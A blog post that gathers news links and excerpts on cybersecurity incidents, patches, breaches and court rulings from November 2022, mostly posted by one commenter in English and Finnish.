This posting is here to collect cyber security news in November 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in November 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
349 Comments
Tomi Engdahl says:
Mississippi election websites knocked out by DDoS attack https://therecord.media/mississippi-election-websites-knocked-out-by-ddos-attack/
Several Mississippi state websites were knocked offline during today’s midterm election in what was the most significant digital disruption of the day, though more could be on the way as ballots are counted.
Tomi Engdahl says:
The Case of Cloud9 Chrome Botnet
https://www.zimperium.com/blog/the-case-of-cloud9-chrome-botnet/
The Zimperium zLabs team recently discovered a malicious browser extension, which not only steals the information available during the browser session but can also install malware on a user’s device and subsequently assume control of the entire device. In this blog, we will take a deeper look into the architecture and modus operandi of this malicious browser extension, originally called Cloud9, by the malware author.
Tomi Engdahl says:
Lenovo fixes flaws that can be used to disable UEFI Secure Boot https://www.bleepingcomputer.com/news/security/lenovo-fixes-flaws-that-can-be-used-to-disable-uefi-secure-boot/
Lenovo has fixed two high-severity vulnerabilities impacting various ThinkBook, IdeaPad, and Yoga laptop models that could allow an attacker to deactivate UEFI Secure Boot.
Tomi Engdahl says:
No Cyberattacks Affected US Vote Counting, Officials Say
https://www.securityweek.com/no-cyberattacks-affected-us-vote-counting-officials-say
No instances of digital interference are known to have affected the counting of the midterm vote after a tense Election Day in which officials were closely monitoring domestic and foreign threats.
A few state and local governments appeared to be hit by a relatively rudimentary form of cyberattack that periodically made public websites unreachable. But U.S. and local officials said Wednesday that none breached vote-counting infrastructure.
“We have seen no evidence that any voting system deleted or lost votes, changed votes, or was any way compromised in any race in the country,” Jen Easterly, director of the U.S. Cybersecurity and Infrastructure Agency, said in a statement.
CISA and other federal agencies had warned that safeguarding U.S. elections has become more complex than ever, with the most serious threats from domestic sources. Foreign adversaries such as Russia, China, and Iran have tried to meddle in individual campaigns and amplify false or misleading narratives on social media.
The website of Mississippi’s secretary of state was down for part of Tuesday and there were other reports of sites becoming unreachable throughout the country, including in Champaign County, Illinois, and parts of Arkansas.
They were all apparently hit with a “distributed denial of service,” in which a website is flooded with inauthentic traffic to cause it to crash. Federal and state officials said they could not say who was responsible for the Mississippi attack or other denial of service incidents, though a pro-Russia group had called on the social media platform Telegram for its followers to target the site.
The site’s inaccessibility meant, for example, that residents could not use the site’s information about the location of voting precincts. DeLano said the secretary of state keeps a separate database for statewide voter registration information and that was not affected by the attack. Same-day election results are not posted on the Mississippi secretary of state’s site, so those also were not affected.
In a statement, Secretary of State Michael Watson credited technology staff who “worked diligently to ensure that Mississippi’s election was secure, and through their hard work, we can confidently say our election system was not compromised.”
Tomi Engdahl says:
Microsoft Patches MotW Zero-Day Exploited for Malware Delivery
https://www.securityweek.com/microsoft-patches-motw-zero-day-exploited-malware-delivery
Microsoft’s latest Patch Tuesday updates address six zero-day vulnerabilities, including one related to the Mark-of-the-Web (MotW) security feature that has been exploited by cybercriminals to deliver malware.
Windows adds the MotW to files coming from untrusted locations, including browser downloads and email attachments. When trying to open files with the MotW, users are warned about the potential risks or, in the case of Office, macros are blocked to prevent malicious code execution.
However, there are ways to bypass MotW defenses. Researcher Will Dormann has identified three different MotW bypass methods and informed Microsoft about them over the summer, but patches were only rolled out now, and only for two of the vulnerabilities. The techniques work against all or most versions of Windows.
One of the methods involves delivering the malicious file inside a ZIP archive. If the malicious file is extracted, it will have the MotW and the user gets a warning. However, if the file is executed directly from within the archive, Windows runs it without any warning. This issue is tracked as CVE-2022-41049 and it has been patched by Microsoft with its November Patch Tuesday updates.
Another MotW bypass method involves making the malicious file ‘read only’ and placing it inside a ZIP archive. When the file is extracted, Windows attempts to set the MotW, but fails, which means the file will be executed by Windows without any warning.
This vulnerability is tracked as CVE-2022-41091 and it has been fixed by Microsoft on Tuesday. This is the method that Microsoft has confirmed as being exploited in the wild.
Tomi Engdahl says:
Gaping Authentication Bypass Holes in VMWare Workspace One
https://www.securityweek.com/gaping-authentication-bypass-holes-vmware-workspace-one
Virtualization technology giant VMware joined the Patch Tuesday train this week to deliver urgent security patches to its VMWare Workspace One product.
The company published an urgent bulletin (VMSA-2022-0028) with barebones details on at least five documented security vulnerabilities that expose VMWare Workspace One users to authentication bypass attacks.
VMWare slapped a critical-severity rating on the bulletin and warned that three of the patched flaws are marked with a CVSS severity score of 9.8/10.
The vulnerabilities — CVE-2022-31685, CVE-2022-31686, CVE-2022-31687, CVE-2022-31688, CVE-2022-31689 — were found and fixed in the VMware Workspace ONE Assist utility and can be exploited to defeat authentication mechanisms.
“A malicious actor with network access to Workspace One Assist may be able to obtain administrative access without the need to authenticate to the application,” VMWare warned multiple times in the advisory.
In the past, security defects in the VMWare Workspace One product have been targeted by attackers in the wild, including nation-state APT actors and ransomware criminals.
Tomi Engdahl says:
iPhone kerää ja jakaa dataasi, vaikka kieltäisit sen
https://etn.fi/index.php/13-news/14224-iphone-keraeae-ja-jakaa-dataasi-vaikka-kieltaeisit-sen
Älypuhelimien tiedetään keräävän kaikenlaista dataa, josta pääosaa tarvitaan sovellusten optimaaliseen toimintaan. Uusi tutkimus kuitenkin paljastaa, että Applen iPhone kerää käyttäjädataa, vaikka toiminnon poistaisi asetuksista.
Myskin perustaja Tommy Mysk avaa tutkimustaan Twitterissä. Hänen mukaansa AppStore kerää käyttäjänsä toiminnasta jatkuvasti reaaliaikaista dataa. Applelle menee tieto siitä, mitä sovelluksia haetaan, mitä mainoksia nähdään, sekä tarkkoja detaljeja käytetystä laitteesta.
Tomi Engdahl says:
Chromeen tuli 5 päivää sitten tärkeä korjaus, jota kaikki eivät ole saaneet – toimi näin
Chrome-käyttäjien on syytä tarkistaa selaimensa versio käsipelillä aikailematta.
https://www.is.fi/digitoday/tietoturva/art-2000009172139.html
Google on julkaissut Chrome-selaimeen päivityksen, joka korjaa vakavan ja hyökkäyksissä jo mahdollisesti käytetyn haavoittuvuuden. Google sanoo blogissaan olevansa tietoinen ilmoituksista, joiden mukaan aukkoon levitetään hyökkäysmenetelmää.
Korjaus päivittää Chromen versioon 107.0.5304.87/.88 Windowsissa ja versioon 107.0.5304.87 Macissa ja Linuxissa. Vaikka Google julkaisi korjauksen jo viime torstaina, se ei ole välttämättä tavoittanut vielä monia.
Periaatteessa voi olla, ettei päivitys ole edes vielä saatavilla. Google sanoo, että korjaus tavoittaa käyttäjät ”päivien/viikkojen kuluessa”. Tämä on Googlen vakiolausahdus kiireellisiäkin aukkoja korjattaessa.
https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html
The Stable channel has been updated to 107.0.5304.87 for Mac and Linux and 107.0.5304.87/.88 for Windows, which will roll out over the coming days/weeks.
Tomi Engdahl says:
Ernesto Van der Sar / TorrentFreak:
Italian court upholds a ban against Cloudflare resolving DNS queries for three torrent sites, after Cloudflare appealed that the ban would impact users globally
Court Upholds Piracy Blocking Order Against Cloudflare’s 1.1.1.1 DNS Resolver
https://torrentfreak.com/court-upholds-piracy-blocking-order-against-cloudflares-1-1-1-1-dns-resolver-221109/
The Court of Rome has confirmed that Cloudflare must block three torrent sites through its public 1.1.1.1 DNS resolver. The blockade was requested by several major record labels and arrives after Italy’s telecoms regulator ordered local ISPs to block the sites. Cloudflare is not pleased with the order and previously noted that such broad measures set a dangerous precedent.
Website blocking has become an increasingly common anti-piracy tool around the globe.
In dozens of countries, ISPs have been ordered by courts to block pirate sites, usually on copyright grounds. More recently, neutral DNS providers have been targeted as well.
Earlier this year, an Italian court ordered Cloudflare to block three torrent sites on its public 1.1.1.1 DNS resolver. The order applies to kickasstorrents.to, limetorrents.pro, and ilcorsaronero.pro, three domains that are already blocked by ISPs in Italy following an order from local regulator AGCOM.
Cloudflare Appeals DNS Blocking Order
Disappointed by the ruling, Cloudflare filed an appeal at the Court of Milan. The internet infrastructure company doesn’t object to blocking requests that target its customers’ websites but believes that interfering with its DNS resolver is problematic, as those measures are not easy to restrict geographically.
“Because such a block would apply globally to all users of the resolver, regardless of where they are located, it would affect end users outside of the blocking government’s jurisdiction,” Cloudflare recently said.
“We therefore evaluate any government requests or court orders to block content through a globally available public recursive resolver as requests or orders to block content globally.”
At the court of appeal, Cloudflare argued that DNS blocking is an ineffective measure that can be easily bypassed, with a VPN for example. In addition, it contested that it is subject to the jurisdiction of an Italian court.
Court Dismisses Appeal
Cloudflare’s defenses failed to gain traction in court and its appeal was dismissed. DNS blocking may not be a perfect solution, but that doesn’t mean that Cloudflare can’t be compelled to intervene.
The dismissal is a win for Sony Music, Warner Music, and Universal, the companies behind the complaint. It’s also seen as a clear victory by Enzo Mazza, CEO of the Italian music industry group FIMI.
“This is an important decision for Italy and beyond. Cloudflare, as well as other intermediaries providing similar services, should step up their efforts in preventing users access to illegal websites which were ordered to be blocked,” Mazza says.
Global music industry group IFPI agrees.
A Precedent
This is the first time that Cloudflare has been ordered to make pirate sites unavailable through its public DNS resolver 1.1.1.1. This is an important expansion since many Italians switched to public DNS resolvers to bypass ISP blocking measures. With the court order, rightsholders can remove this shortcut.
While this type of order is new in Italy, a similar blocking injunction was requested in Germany last year. A local court ordered DNS provider Quad9 to block a pirate site but the decision is still under appeal.
Tomi Engdahl says:
https://www.securityweek.com/abb-oil-and-gas-flow-computer-hack-can-prevent-utilities-billing-customers
Tomi Engdahl says:
Fingerprints make Bad Passwords — they’re not secret, they are irrevocable, and they’re unhashable making them difficult to store securely. https://hackaday.com/2015/11/10/your-unhashable-fingerprints-secure-nothing/
Tomi Engdahl says:
https://arstechnica.com/gaming/2022/11/twitter-scammers-use-musks-paid-checkmarks-to-spread-official-looking-fake-news/ el oh el
Tomi Engdahl says:
Laptop flaws could help malware survive a hard disk wipe https://www.tripwire.com/state-of-security/laptop-flaws-could-help-malware-survive-hard-disk-wipe
PC manufacturer Lenovo has been forced to push out a security update to more than two dozen of its laptop models, following the discovery of high severity vulnerabilities that could be exploited by malicious hackers. Security researchers at ESET discovered flaws in 25 of its laptop models – including IdeaPads, Slims, and ThinkBooks – that could be used to disable the UEFI Secure Boot process. That matters because Secure Boot, as its name suggests, is a feature that allows a PC’s firmware to be “locked down” as a defence against rootkits, ensuring that only trusted cryptographically-signed code can be run at bootup.
A vulnerability in the laptops’ Secure Boot process could open opportunities for cybercriminals to install malicious firmware onto a device that would survive a hard drive being wiped or an operating system being reinstalled.
Tomi Engdahl says:
Worok hackers hide new malware in PNGs using steganography https://www.bleepingcomputer.com/news/security/worok-hackers-hide-new-malware-in-pngs-using-steganography/
A threat group tracked as Worok’ hides malware within PNG images to infect victims’ machines with information-stealing malware without raising alarms. This has been confirmed by researchers at Avast, who built upon the findings of ESET, the first to spot and report on Worok’s activity in early September 2022. ESET warned that Worok targeted high-profile victims, including government entities in the Middle East, Southeast Asia, and South Africa, but their visibility into the group’s attack chain was limited. Avast’s report is based on additional artifacts the company captured from Worok attacks, confirming ESET’s assumptions about the nature of the PNG files and adding new information on the type of malware payloads and the data exfiltration method.
Tomi Engdahl says:
Russian LockBit ransomware operator arrested in Canada https://www.bleepingcomputer.com/news/security/russian-lockbit-ransomware-operator-arrested-in-canada/
Europol has announced today the arrest of a Russian national linked to LockBit ransomware attacks targeting critical infrastructure organizations and high-profile companies worldwide. The suspect was arrested in Ontario, Canada, last month following an investigation led by the French National Gendarmerie with the help of Europol’s European Cybercrime Centre (EC3), the FBI, and the Canadian Royal Canadian Mounted Police (RCMP). “A 33-year old Russian national, the suspect is believed to have deployed the LockBit ransomware to carry out attacks against critical infrastructure and large industrial groups across the world.”
Tomi Engdahl says:
Kaspersky to kill its VPN service in Russia next week https://www.bleepingcomputer.com/news/security/kaspersky-to-kill-its-vpn-service-in-russia-next-week/
Kaspersky is stopping the operation and sales of its VPN product, Kaspersky Secure Connection, in the Russian Federation, with the free version to be suspended as early as November 15, 2022. As the Moscow-based company informed on its Russian blog earlier this week, the shutdown of the VPN service will be staged, so that impact on customers remains minimal. Purchases of the paid version of Kaspersky Secure Connection will remain available on both the official website and mobile app stores until December 2022. Customers with active subscriptions will continue to enjoy the product’s VPN service until the end of the paid period, which cannot go beyond the end of 2023 (one-year subscription).
Tomi Engdahl says:
https://www.securityweek.com/twitter-security-chief-resigns-musk-sparks-deep-concern
Tomi Engdahl says:
Apple Patches Remote Code Execution Flaws in iOS, macOS
https://www.securityweek.com/apple-patches-remote-code-execution-flaws-ios-macos
Apple on Tuesday released out-of-band patches for iOS and macOS, to address two arbitrary code execution vulnerabilities in the libxml2 library.
Written in the C programming language and originally developed for the Gnome project, libxml2 is a software library for parsing XML documents.
Tracked as CVE-2022-40303 and CVE-2022-40304, the two vulnerabilities could lead to remote code execution. Apple has credited Google Project Zero security researchers for both issues.
“A remote user may be able to cause unexpected app termination or arbitrary code execution,” Apple notes for both security flaws.
Tomi Engdahl says:
https://www.securityweek.com/russian-national-arrested-canada-over-lockbit-ransomware-attacks
Tomi Engdahl says:
Ransomware Gang Offers to Sell Files Stolen From Continental for $50 Million
https://www.securityweek.com/ransomware-gang-offers-sell-files-stolen-continental-50-million
A notorious ransomware group is offering to sell files allegedly stolen from German car parts giant Continental for $50 million.
Continental reported in August that it had been targeted in a cyberattack that resulted in hackers accessing some of its systems. The company said at the time that the attack had been “averted” and that business activities were not affected.
The LockBit ransomware group recently revealed on its leak website that it was behind the attack on Continental and threatened to make public information stolen from the company.
Tomi Engdahl says:
Analysis of Russian Cyberspy Attacks Leads to Discovery of Windows Vulnerability
https://www.securityweek.com/analysis-russian-cyberspy-attacks-leads-discovery-windows-vulnerability
An analysis of the numerous LDAP queries that Russian cyberespionage group APT29 had made to the Active Directory system has led to the discovery of a vulnerability in Windows’ ‘credential roaming’ functionality.
Also referred to as Cozy Bear, the Dukes, and Yttrium, APT29 is a Russian cyberespionage group likely sponsored by the Russian Foreign Intelligence Service (SVR).
The group is believed to be responsible for multiple high-profile attacks, including the 2016 targeting of the Democratic National Committee (DNC), a 2018 attempt to infiltrate the DNC, and the 2020 SolarWinds attack.
In a May 2022 report, Mandiant revealed that the group had been launching phishing attacks against diplomatic organizations in Europe, the Americas, and Asia, in an attempt to infect them with new malware families.
Now, the Google subsidiary reveals that its investigation into an APT29 incident has led to the discovery of CVE-2022-30170 (CVSS score of 7.3), a vulnerability potentially allowing attackers to gain remote code execution.
Microsoft released patches for CVE-2022-30170 on the September 2022 Patch Tuesday, describing the issue as an elevation of privilege bug.
“An attacker who successfully exploited the vulnerability could gain remote interactive logon rights to a machine where the victim’s account would not normally hold such privilege,” the tech giant notes.
Tomi Engdahl says:
ABB Oil and Gas Flow Computer Hack Can Prevent Utilities From Billing Customers
https://www.securityweek.com/abb-oil-and-gas-flow-computer-hack-can-prevent-utilities-billing-customers
Oil and gas flow computers and remote controllers made by Swiss industrial technology firm ABB are affected by a serious vulnerability that could allow hackers to cause disruptions and prevent utilities from billing their customers, according to industrial cybersecurity firm Claroty.
Utilities rely on flow computers to calculate oil and gas flow rates and volume. These devices, which are often used in the electric power sector, play an important role in process safety, as well as billing.
Researchers at Claroty showed how an attacker with access to a targeted flow computer can bypass authentication using a brute-force attack, and then exploit a path traversal vulnerability to read the device’s shadow password file to obtain its root account password. The same vulnerability can be used to modify the SSH configuration file to enable password authentication and allow the attacker to access the device with root privileges.
Claroty reported its findings to ABB, which announced the release of firmware patches for affected products in July. The path traversal vulnerability is tracked as CVE-2022-0902 and it has been assigned a ‘high severity’ rating.
Claroty has published a blog post detailing its research, as well as a video showing how an attacker could hack a device.
An Oil and Gas Weak Spot: Flow Computers
https://claroty.com/team82/research/an-oil-and-gas-weak-spot-flow-computers
Tomi Engdahl says:
https://www.securityweek.com/no-cyberattacks-affected-us-vote-counting-officials-say
Tomi Engdahl says:
https://www.securityweek.com/microsoft-patches-motw-zero-day-exploited-malware-delivery
Tomi Engdahl says:
https://etn.fi/index.php/13-news/14233-yksi-piiri-muuttaa-pixel-7-n-autonavaimiksi
Tomi Engdahl says:
Ei kannata matkustaa Ranskaan. Siellä voi saada 5 vuotta linnaa jos ei luovuta puhelimen PIN-koodia poliisille.
French Court rules that refusing to disclose a mobile passcode to law enforcement is a criminal offence
https://www.fairtrials.org/articles/news/french-court-rules-that-refusing-to-disclose-a-mobile-passcode-to-law-enforcement-is-a-criminal-offence/
The French Court of Cassation has ruled that people who are suspected or accused of a crime are obliged to reveal the passcode of their mobile phone to the investigative authorities. The Court found that a mobile phone passcode can be considered a “secret decryption agreement of a means of cryptology” (convention de déchiffrement d’un moyen de cryptologie). Refusing to hand over the passcode of a mobile phone is punishable by a fine of up to 270,000 EUR or three years’ imprisonment. This punishment is increased to a fine of 450,000 EUR or five years’ imprisonment where revealing a passcode and giving access to the content of the mobile device could have prevented a criminal offence or reduced its impact.
Tomi Engdahl says:
Venäläishakkerit varastivat lähes 10 miljoonan terveystiedot Australiassa – mukana pääministeri https://www.is.fi/digitoday/tietoturva/art-2000009194594.html
Tomi Engdahl says:
”Donald Trump” ja ”Jeesus” sikailevat ja hämmentävät – Twitterissä täysi kaaos https://www.is.fi/digitoday/art-2000009194955.html
Tomi Engdahl says:
https://www.uusiteknologia.fi/2022/11/11/haittaohjelmissa-uusi-ykkonen/
Tomi Engdahl says:
https://etn.fi/index.php/13-news/14241-uusi-pankkitroijalainen-nousi-android-haittojen-kaerkeen
Tomi Engdahl says:
TransUnion breached, consumers’ financial information exposed
https://appleinsider.com/articles/22/11/10/transunion-data-breach-exposes-consumers-financial-information
TransUnion has sent letters to consumers alerting them to a recent data breach that compromised a wide array of their personal and financial information.
On Monday, TransUnion reported a data breach with the Massachusetts Attorney General. It currently isn’t known how many people were affected in the breach.
According to JDSupra, TransUnion said that the breach resulted in names, full Social Security numbers, financial account numbers, and complete driver’s license numbers being compromised.
TransUnion is one of the largest consumer credit reporting agencies, collating information from more than a billion users globally and 200 million files in the United States alone.
https://www.jdsupra.com/legalnews/transunion-llc-confirms-recent-data-6828319/
On November 7, 2022, TransUnion LLC reported a data breach with the Massachusetts Attorney General after information in the company’s possession was subject to unauthorized access. According to TransUnion, the breach resulted in the names, Social Security numbers, financial account numbers and driver’s license numbers being compromised. Recently, TransUnion sent out data breach letters to all affected parties, informing them of the incident and what they can do to protect themselves from identity theft and other frauds.
While the total number of people affected by the TransUnion data breach remains unknown at this point, the company has stated that it possesses “200 million files profiling nearly every credit-active consumer in the United States.” As we’ve noted in previous posts, the information leaked in a data breach can be used to commit identity theft and other frauds against victims of a breach. Thus, it is imperative that anyone who receives a data breach notification letter or email from TransUnion takes the necessary steps to protect themselves by mitigating these risks. Aggrieved consumers may also pursue a data breach lawsuit against the company if evidence emerges that it was negligent in the storage of their data.
Tomi Engdahl says:
Fortinet addressed 16 vulnerabilities in some of the company’s products, six flaws received a ‘high’ severity rate
.https://securityaffairs.co/wordpress/138021/security/fortinet-nov-2022-flaws.html
Tomi Engdahl says:
https://techcrunch.com/2022/11/10/google-surveillance-samsung-spyware/
Tomi Engdahl says:
https://therecord.media/cyber-incident-at-boeing-subsidiary-causes-flight-planning-disruptions/
Tomi Engdahl says:
15,000 sites hacked for massive Google SEO poisoning campaign
https://www.bleepingcomputer.com/news/security/15-000-sites-hacked-for-massive-google-seo-poisoning-campaign/
Hackers are conducting a massive black hat search engine optimization (SEO) campaign by compromising almost 15,000 websites to redirect visitors to fake Q&A discussion forums.
The attacks were first spotted by Sucuri, who says that each compromised site contains approximately 20,000 files used as part of the search engine spam campaign, with most of the sites being WordPress.
The researchers believe the threat actors’ goal is to generate enough indexed pages to increase the fake Q&A sites’ authority and thus rank better in search engines.
Targeting WordPress sites
Sucuri reports that the hackers are modifying WordPress PHP files, such as ‘wp-singup.php’, ‘wp-cron.php’, ‘wp-settings.php’, ‘wp-mail.php’, and ‘wp-blog-header.php’, to inject the redirects to the fakes Q&A discussion forums.
The infected or injected files contain malicious code that checks if the website visitors are logged in to WordPress, and if they’re not, redirects them to the https://ois.is/images/logo-6.png URL.
However, browsers will not be sent an image from this URL but will instead have JavaScript loaded that redirects users to a Google search click URL that redirects users to the promoted Q&A site.
The exclusion of logged-in users, as well as those standing at ‘wp-login.php,’ aims to avoid redirecting an administrator of the site, which would result in the raising of suspicion and the cleaning of the compromised site.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/technology/ace-seizes-42-soccer-and-live-tv-piracy-web-domains-with-millions-of-visitors/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/new-hacking-group-uses-custom-symatic-cobalt-strike-loaders/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/microsoft/microsoft-winget-package-manager-failing-due-to-cdn-issues/
Tomi Engdahl says:
Patches for 6 0-days under active exploit are now available from Microsoft
Exchange, Windows, and a bunch of other Microsoft software all affected.
https://arstechnica.com/information-technology/2022/11/patches-for-6-zero-days-under-active-exploit-are-now-available-from-microsoft/
Tomi Engdahl says:
Experian tool exposed partial Social Security numbers, putting customers at risk
https://www.cyberscoop.com/experian-kbv-ssn-nist-identity-theft/
Tomi Engdahl says:
FBI varoittaa: On laiteryhmä, joihin hyökkääminen vaarantaa hengen https://www.is.fi/digitoday/tietoturva/art-2000009195270.html
FBI pelkää esimerkiksi sydämentahdistimiin kohdistuvia kyberhyökkäyksiä.
Tomi Engdahl says:
YHDYSVALTAIN liittovaltion poliisi FBI varoitti (pdf) päivittämättömien lääkinnällisten laitteiden mahdollistavan kyberhyökkäyksiä. Lääkinnällisillä laitteilla FBI tarkoittaa esimerkiksi insuliinipumppuja, tietynlaisia defibrillaattoreita, sydämentahdistimia ja intratekaalisia pumppuja kivun lievittämiseen
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/thousands-of-github-repositories-deliver-fake-poc-exploits-with-malware/
Tomi Engdahl says:
Fodcha DDoS botnet reaches 1Tbps in power, injects ransoms in packets
https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/microsoft-defender-network-protection-generally-available-on-ios-android/
Tomi Engdahl says:
https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/
Tomi Engdahl says:
New BadBazaar Android malware linked to Chinese cyberspies https://www.bleepingcomputer.com/news/security/new-badbazaar-android-malware-linked-to-chinese-cyberspies/
A previously undocumented Android spyware tool named BadBazaar’ has been discovered targeting ethnic and religious minorities in China, most notably the Uyghurs in Xinjiang. The new spyware was originally discovered by MalwareHunterTeam and linked to Bahamut in VirusTotal detections. After further analysis by Lookout, the malware was found to be new spyware using the same infrastructure seen in 2020 campaigns against Uyghurs by the state-backed hacking group APT15 (aka “Pitty Tiger). Additionally, Lookout observed a second campaign using new variants of Moonshine, ‘ a spyware discovered by CitizenLab in 2019 while deployed against Tibetan groups.
Tomi Engdahl says:
Microsoft fixes Windows zero-day bug exploited to push malware https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-zero-day-bug-exploited-to-push-malware/
As part of the November Patch Tuesday updates, Microsoft fixed numerous vulnerabilities that allowed threat actors to craft files that can bypass the Mark of the Web security feature. Included in the updates was an unexpected fix for a bug that threat actors commonly abuse in phishing campaigns. According to Bill Demirkapi, an engineer in Microsoft MSRC’s Vulnerability and Mitigations team, a bug was fixed that prevented the MoTW flag from propagating to files inside an ISO disk image. For some time, threat actors have been distributing ISO disk images as attachments in phishing campaigns to infect targets with malware.
Tomi Engdahl says:
Canadian food retail giant Sobeys hit by Black Basta ransomware https://www.bleepingcomputer.com/news/security/canadian-food-retail-giant-sobeys-hit-by-black-basta-ransomware/
Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend.
Sobeys is one of two national grocery retailers in Canada, with 134,
000 employees servicing a network of 1, 500 stores in all ten provinces under multiple retail banners, including Sobeys, Safeway, IGA, Foodland, FreshCo, Thrifty Foods, and Lawtons Drugs. In a press release published Monday, Sobeys’ parent company Empire revealed that while its grocery stores were still open, some services were impacted by this company-wide IT issue. Based on ransom notes and negotiation chats BleepingComputer has seen, the attackers deployed Black Basta ransomware payloads to encrypt systems on Sobeys’ network.
Tomi Engdahl says:
Poliisi varoittaa huijausviesteistä näyttävät tulevan
teleoperaattorilta: “Tulee poistaa välittömästi”
https://www.is.fi/digitoday/tietoturva/art-2000009194783.html
LOUNAIS-SUOMEN poliisi varoittaa viranomaisten nimissä lähetetyistä huijausviesteistä. Viestejä on tullut ainakin verottajaksi ja ulosottoviranomaiseksi tekeytyen. Viesteissä on vaadittu rahaa, ja niissä on ollut mukana maksulinkki. Huijauksesta tekee uskottavan se, että viestit näyttävät tulevan teleoperaattorin nimissä. Tekstiviestin lähettäjä on helppo väärentää, mutta siitä huolimatta se on vahva tehokeino huijauksen tehostamiseksi. Tämänkaltaisen viestin saatuaan viesti tulee poistaa välittömästi. Viestissä olevia linkkejä ei tule avata. Asiasta ei tarvitse tehdä rikosilmoitusta, jos ei ole avannut viestin linkkiä tai maksanut mitään, poliisi ohjeistaa.